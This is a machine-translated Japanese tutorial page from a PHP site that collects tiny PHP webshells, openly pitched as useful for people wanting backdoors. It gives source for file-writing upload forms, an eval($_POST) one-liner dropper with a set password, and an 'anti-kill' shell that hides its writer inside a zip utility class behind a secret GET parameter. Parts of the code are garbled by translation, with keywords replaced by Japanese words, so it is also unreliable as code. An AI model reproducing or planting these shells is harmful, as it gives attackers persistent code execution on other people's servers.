ホームページ >php教程 >php手册 >超小型 PHP ポニーの概要 (バックドアを探している友達に便利)

超小型 PHP ポニーの概要 (バックドアを探している友達に便利)

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBオリジナル: 2016-06-13 12:01:031861ブラウズ

著者: スパイダー
私も超小型の PHP ポニーを飼っています

コードをコピーしますコードは次のとおりです:

header("content-Type: text/html; charset=gb2312");
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v ) $ _POST[$k] =tripslashes($v);

保存ファイル名:

name= "text" COLS="70" ROWS="18" >

if(isset($_POST['file']))
{
$fp = @fopen($ _POST[ 'file'],'wb');
echo @fwrite($fp,$_POST['text']) '保存に失敗しました!'; fp) ;
}
?>

昨夜、退屈して php のチュートリアルをいくつか見ましたが、php は本当に強力であることがわかりました。ちなみに私が書いたのは
php pony

コードは以下に直接貼り付けています。。

コードをコピーします

コードは次のとおりです:

作成者: SinCoder< ;/title> ; php ponyBy:SinCoder <? このプログラムのパス: .__FILE__ . "サーバーのオペレーティングシステム: ".PHP_OS. "サーバーの IP アドレス: ".gethostbyname($_SERVER["SERVER_NAME"])。 PHP バージョン: ".PHP_VERSION; ?> <フォームアクション = <? echo strrchr(__FILE__,"\"); ?> メソッド="post"> 送信するデータ: <textarea type="text" name="data" rows="10"cols="30"> > 保存パス:<input type="text" name="dir" /> <input type="submit" value="送信" /> </form> </html> <? if(!(isset($_POST["data"]) && isset($_POST[ "dir "]))) exit(); if(strlen($_POST["data"])>0 && strlen($_POST["dir"])>0) { $p_File=fopen($_POST["dir"],"a"); if(!$p_File) echo "書き込みに失敗しました! ディレクトリを変更してみてください!"; else echo "OK!! "; fputs($p_File,$_POST["data"]); fclose($p_File); else echo "データを完全に入力してください。「; <?fputs(fopen(jb51.php,w),<?eval($_POST[jb51]);?>)?>以下のようにアクセスします。その後、カレントディレクトリに <?eval($_POST[jb51]);?>)?> の内容で jb51.php を生成し、パスワードは jb51 anti-kill php script Horse コードをコピー コードは次のとおりです: <?php class zip { var $datasec, $ctrl_dir = array(); var $eof_ctrl_dir = "x50x4bx05x06x00x00x00x00"; var $old_offset = 0; var $dirs = Array("."); 関数 get_List($zip_name) { $ret = ''; $zip = @fopen($zip_name, 'rb'); if(!$zip) return(0); $centd = $this->ReadCentralDir($zip,$zip_name); @rewind($zip); @fseek($zip, $centd['offset']); for ($i=0; $i<$centd['entries']; $i ) { $header = $this->ReadCentralFileHeaders($zip); $header['index'] = $i;$info['filename'] = $header['filename']; $info['stored_filename'] = $header['stored_filename']; $info['size'] = $header['size'];$info['compressed_size']=$header['compressed_size']; $info['crc'] = strtoupper(dechex( $header['crc'] )); $info['mtime'] = $header['mtime']; $info['コメント'] = $header['コメント']; $info['folder'] = ($header['external']==0x41FF0010||$header['external']==16)?1:0; $info['index'] = $header['index'];$info['status'] = $header['status']; $ret[]=$info; unset($header); } return $ret; } 関数 Add($files,$compact) { if(!is_array($files[0])) $files=Array($files); for($i=0;$files[$i];$i ){ $fn = $files[$i]; if(!in_Array(dirname($fn[0]),$this->dirs)) $this->add_Dir(dirname($fn[0])); if(basename($fn[0])) $ret[basename($fn[0])]=$this->add_File($fn[1],$fn[0],$コンパクト）; } return $ret; } function get_file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); $data を返します。 $ctrldir 。 $this -> eof_ctrl_dir 。 pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)). pack('V', strlen($ctrldir)) 。 Pack('V', strlen($data)) 。 "x00x00"; } function add_dir($name) { $name = str_replace("\", "/", $name); $fr = "x50x4bx03x04x0ax00x00x00x00x00x00x00x00x00"; $fr .= Pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); $fr .= Pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); $this ->データセック[] = $fr; $new_offset = strlen(implode("", $this->datasec)); $cdrec = "x50x4bx01x02x00x00x0ax00x00x00x00x00x00x00x00x00"; $cdrec .= Pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); $cdrec .= Pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); $ext = "xffxffxffxff"; $cdrec .= Pack("V", 16 ).pack("V", $this -> old_offset ).$name; $this -> ctrl_dir[] = $cdrec; $this -> old_offset = $new_offset; $this -> dirs[] = $name; } function add_File($data, $name, $compact = 1) { $name = str_replace('\', '/', $name); $dtime = dechex($this->DosTime()); $hexdtime = 'x' 。 $dtime[6] 。 $dtime[7].'x'.$dtime[4] 。 $dtime[5] 。 'x' 。 $dtime[2] 。 $dtime[3].'x'.$dtime[0].$dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); if($compact) $fr = "x50x4bx03x04x14x00x00x00x08x00".$hexdtime; else $fr = "x50x4bx03x04x0ax00x00x00x00x00".$hexdtime; $unc_len = strlen($data); $crc = crc32($data); if($compact){ $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); }else{ $zdata = $data; } $c_len=strlen($zdata); $fr .= Pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); $fr .= Pack('v', strlen($name)).pack('v', 0).$name.$zdata; $fr .= Pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); $this ->データセック[] = $fr; $new_offset = strlen(implode('', $this->datasec)); if($compact) $cdrec = "x50x4bx01x02x00x00x14x00x00x00x08x00"; else $cdrec = "x50x4bx01x02x14x00x0ax00x00x00x00x00"; $cdrec .= $hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); $cdrec .= Pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 ); $cdrec .= Pack('v', 0 ).pack('v', 0 ).pack('V', 32 ); $cdrec .= Pack('V', $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; true を返します。 } function DosTime() { $timearray = getdate(); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['時間'] = 0; $timearray['分'] = 0; $timearray['秒'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['時間'] << 11) | ($timearray['分'] << 5) | ($timearray['秒'] >> 1); } //圧縮パッケージ全体を解凍します //Extract を直接使用すると、パスの問題が発生します。この関数は、Extract を実行する前に、まずリストからファイル情報を取得し、すべてのディレクトリを作成します。 関数 ExtractAll ( $zn, $ to) { if(substr($to,-1)!="/") $to .= "/"; $files = $this->get_List($zn); $cn = count($files); if(is_array($files)) { for($i=0;$i{ if($files[$i]['folder']==1){ @mkdir($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']) ; @chmod($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); } } } $this-> ;抽出 ($zn,$to); } 関数抽出 ( $zn, $to, $index = Array(-1) ) { $ok = 0; @fopen($zn,'rb'); if(!$zip) return(-1); $cdir = $this->ReadCentralDir($zip,$zn); pos_entry = $cdir['offset']; if(!is_array($index)){ $index = array($index) } for($i=0; isset($index[$i)] ]);$i ){ if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries']) return(-1); } for ($i=0; $i{ @fseek($zip, $pos_entry) ; $header = $this->ReadCentralFileHeaders($zip); $header['index'] = $i; @rewind($zip); ; fseek($zip, $header['offset']); if(in_array("-1",$index)||in_array($i,$index)) $stat[$header[ 'ファイル名']]=$this->ExtractFile($header, $to, $zip); } fclose($zip); return $stat; function ReadFileHeader($zip) { $binary_data = fread($zip, 30) $data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size /Vsize/vfilename_len/vextra_len', $binary_data); $header['filename'] = fread($zip, $data['filename_len']); if ($data['extra_len'] ! = 0) { $header['extra'] = fread($zip, $data['extra_len']); } else { $header['extra'] = ''; $header['compression'] = $data['compression'];$header['size'] = $data['size']; $header['compressed_size'] = $data['compressed_size'] ; $header['crc'] = $data['crc']; $header['flag'] = $data['flag']; $header['mdate'] = $data[ 'mdate'];$header['mtime'] = $data['mtime']; if ($header['mdate'] && $header['mtime']){ $hour=( $header['mtime']&0xF800)>>11;$ minutes=($header['mtime']&0x07E0)>>5; $seconde=($header['mtime']&0x001F) *2;$year=(($header['mdate']&0xFE00)>>9) 1980; $month=($header['mdate']&0x01E0)>>$day= $header['mdate']&0x001F; $header['mtime'] = mktime($hour, $minde, $month, $day, $year); }else{$header[ 'mtime'] = time();} $header['stored_filename'] = $header['filename']; $header['status'] = "ok"; return $header ; } function ReadCentralFileHeaders($zip){ $binary_data = fread($zip, 46); $header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/ vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data); if ($header['filename_len'] != 0) $header ['ファイル名'] = fread($zip,$header['ファイル名_len']); else $header['ファイル名'] = ''; if ($header['extra_len'] != 0) ) $header['extra'] = fread($zip, $header['extra_len']); else $header['extra'] = ''; comment_len'] != 0) $header['comment'] = fread($zip, $header['comment_len']); else $header['comment'] = ''; if ($header['mdate'] && $header['mtime']) { $hour = ($header['mtime'] & 0xF800) >> = ($header['mtime'] & 0x07E0) >> $秒 = ($header['mtime'] & 0x001F)*2; mdate'] & 0xFE00) >> 9) $month = ($header['mdate'] >> 5; & 0x001F; $header['mtime'] = mktime($hour, $nute, $month, $day, $year); else { $header['mtime' ] = 時間(); $header['stored_filename'] = $header['status'] = 'ok'; ($header['filename'], -1) == '/') $header['external'] = 0x41FF0010; return $header; } function ReadCentralDir($zip) ,$zip_name) { $size = filesize($zip_name); if ($size else $maximum_size=277; fseek($zip, $size-$maximum_size); $pos = ftell($zip); $bytes = 0x00000000; { $byte = @fread($zip, 1); $bytes = ($bytes << 8); $bytes == 0x504b0506 } $pos ; } $data = @unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',fread($zip, 18)); if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']); else $centd['comment'] = ''; $centd['entries'] = $data['entries']; $centd['disk_entries'] = $data['disk_entries']; $centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start']; $centd['サイズ'] = $data['サイズ']; $centd['ディスク'] = $data['ディスク']; $centd を返す; } function ExtractFile($header,$to,$zip) { $header = $this->readfileheader($zip); $header['external'] = (!isset($header['external']) ? 0 : $header['external']); if(substr($to,-1)!="/") $to.="/"; if(!@is_dir($to)) @mkdir($to,$GLOBALS['cfg_dir_purview']); if (!($header['external']==0x41FF0010)&&!($header['external']==16)) { if ($header['compression']= =0) { $fp = @fopen($to.$header['ファイル名'], 'wb'); if(!$fp) return(-1); $size = $header['compressed_size']; while ($size != 0) { $read_size = ($size < 2048 ? $size : 2048); $buffer = fread($zip, $read_size); $binary_data = Pack('a'.$read_size, $buffer); @fwrite($fp, $binary_data, $read_size); $size -= $read_size; } fclose($fp); touch($to.$header['filename'], $header['mtime']); }else{ $fp = @fopen($to.$header['filename'].'.gz','wb'); if(!$fp) return(-1); $binary_data = Pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']), Chr(0x00), time(), Chr(0x00), Chr(3)); fwrite($fp, $binary_data, 10); $size = $header['compressed_size']; while ($size != 0) { $read_size = ($size < 1024 ? $size : 1024); $buffer = fread($zip, $read_size); $binary_data = Pack('a'.$read_size, $buffer); @fwrite($fp, $binary_data, $read_size); $size -= $read_size; } $binary_data = Pack('VV', $header['crc'], $header['size']); fwrite($fp, $binary_data,8); fclose($fp); $gzp = @gzopen($to.$header['filename'].'.gz','rb') または die("Cette archive est compress"); if(!$gzp) return(-2); $fp = @fopen($to.$header['filename'],'wb'); if(!$fp) return(-1); $size = $header['size']; while ($size != 0) { $read_size = ($size < 2048 ? $size : 2048); $buffer = gzread($gzp, $read_size); $binary_data = Pack('a'.$read_size, $buffer); @fwrite($fp, $binary_data, $read_size); $size -= $read_size; } fclose($fp); gzclose($gzp); touch($to.$header['filename'], $header['mtime']); @unlink($to.$header['ファイル名'].'.gz'); }} true を返します。 } } if($_GET['zxzgcn']=='login'){ header("content-Type: text/html; charset=gb2312"); if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] =tripslashes($v); ?> <フォームメソッド="POST"> 保存先: <input type="text" name="file" size="60" value="<? echo str_replace('\','/',__FILE__) ?>"> <textarea name="text" COLS="70" ROWS="18" ></textarea> <input type="submit" name="submit" value="save"> <?php if(isset($_POST['file'])) { $fp = @fopen($_POST['file'],'wb'); echo @fwrite($fp,$_POST['text']) ? 「成功しました！」 : 「落ちた!」; @fclose($fp); } } ?> 用法xxx.php?zxzgcn=login </div><div class="nphpQianMsg"><div class="clear"></div></div><div class="nphpQianSheng">声明：<div>この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。</div></div></div><div class="nphpSytBox">前の記事：<a class="dBlack" title="PHP ネイティブテンプレートエンジン最も単純なテンプレートエンジン" href="https://m.php.cn/ja/faq/201508.html">PHP ネイティブテンプレートエンジン最も単純なテンプレートエンジン</a>次の記事：<a class="dBlack" title="PHP ネイティブテンプレートエンジン最も単純なテンプレートエンジン" href="https://m.php.cn/ja/faq/201516.html">PHP ネイティブテンプレートエンジン最も単純なテンプレートエンジン</a></div><div class="nphpSytBox2"><div class="nphpZbktTitle"><h2>関連記事</h2><a href="https://m.php.cn/ja/article.html" class="bBlack">続きを見る</a><div class="clear"></div></div><ins class="adsbygoogle" style="display:block" data-ad-format="fluid" data-ad-layout-key="-6t+ed+2i-1n-4w" data-ad-client="ca-pub-5902227090019525" data-ad-slot="8966999616"></ins><script> (adsbygoogle = window.adsbygoogle || []).push({}); </script><ul class="nphpXgwzList"><li><a href="https://m.php.cn/ja/faq/92233.html" title="Windows7系统下Netbeans+PHPUnit搭建PHP单元测试开发环境及PHPUn" class="aBlack">Windows7系统下Netbeans+PHPUnit搭建PHP单元测试开发环境及PHPUn</a><div class="clear"></div></li><li><a href="https://m.php.cn/ja/faq/97151.html" title="程序猿ProMonkey V2.03" class="aBlack">程序猿ProMonkey V2.03</a><div class="clear"></div></li><li><a href="https://m.php.cn/ja/faq/94770.html" title="PHP Navigator" class="aBlack">PHP Navigator</a><div class="clear"></div></li><li><a href="https://m.php.cn/ja/faq/90182.html" title="php返回数组中指定的一列（php5.5.0默认函数array_column()在php" class="aBlack">php返回数组中指定的一列（php5.5.0默认函数array_column()在php</a><div class="clear"></div></li><li><a href="https://m.php.cn/ja/faq/208396.html" title="htmlentitiesとhtmlspecialcharsの違いの詳しい説明" class="aBlack">htmlentitiesとhtmlspecialcharsの違いの詳しい説明</a><div class="clear"></div></li></ul></div></div><ins class="adsbygoogle" style="display:block" data-ad-format="autorelaxed" data-ad-client="ca-pub-5902227090019525" data-ad-slot="5027754603"></ins><script> (adsbygoogle = window.adsbygoogle || []).push({}); </script><footer><div class="footer"><div class="footertop"><img src="/static/imghwm/logo.png" alt="">福祉オンライン PHP トレーニング，PHP 学習者の迅速な成長を支援します！</div><div class="footermid"><a href="https://m.php.cn/ja/about/us.html">私たちについて</a><a href="https://m.php.cn/ja/about/disclaimer.html">免責事項</a><a href="https://m.php.cn/ja/update/article_0_1.html">Sitemap</a></div><div class="footerbottom"> © php.cn All rights reserved </div></div></footer><script>isLogin = 0;</script><script type="text/javascript" src="/static/layui/layui.js"></script><script type="text/javascript" src="/static/js/global.js?4.9.47"></script></div><script src="https://vdse.bdstatic.com//search-video.v1.min.js"></script><link rel='stylesheet' id='_main-css' href='/static/css/viewer.min.css' type='text/css' media='all'/><script type='text/javascript' src='/static/js/viewer.min.js?1'></script><script type='text/javascript' src='/static/js/jquery-viewer.min.js'></script><script>jQuery.fn.wait = function (func, times, interval) { var _times = times || -1, //100次 _interval = interval || 20, //20毫秒每次 _self = this, _selector = this.selector, //选择器 _iIntervalID; //定时器id if( this.length ){ //如果已经获取到了，就直接执行函数 func && func.call(this); } else { _iIntervalID = setInterval(function() { if(!_times) { //是0就退出 clearInterval(_iIntervalID); } _times <= 0 || _times--; //如果是正数就 -- _self = $(_selector); //再次选择 if( _self.length ) { //判断是否取到 func && func.call(_self); clearInterval(_iIntervalID); } }, _interval); } return this; } $("table.syntaxhighlighter").wait(function() { $('table.syntaxhighlighter').append(""); }); $(document).on("click", ".cnblogs_code_footer",function(){ $(this).parents('table.syntaxhighlighter').css('display','inline-table');$(this).hide(); }); $('.nphpQianCont').viewer({navbar:true,title:false,toolbar:false,movable:false,viewed:function(){$('img').click(function(){$('.viewer-close').trigger('click');});}}); </script></body><script> var _paq = window._paq = window._paq || []; /* tracker methods like "setCustomDimension" should be called before "trackPageView" */ _paq.push(['trackPageView']); _paq.push(['enableLinkTracking']); (function() { var u="https://tongji.php.cn/"; _paq.push(['setTrackerUrl', u+'matomo.php']); _paq.push(['setSiteId', '9']); var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0]; g.async=true; g.src=u+'matomo.js'; s.parentNode.insertBefore(g,s); })(); </script></html>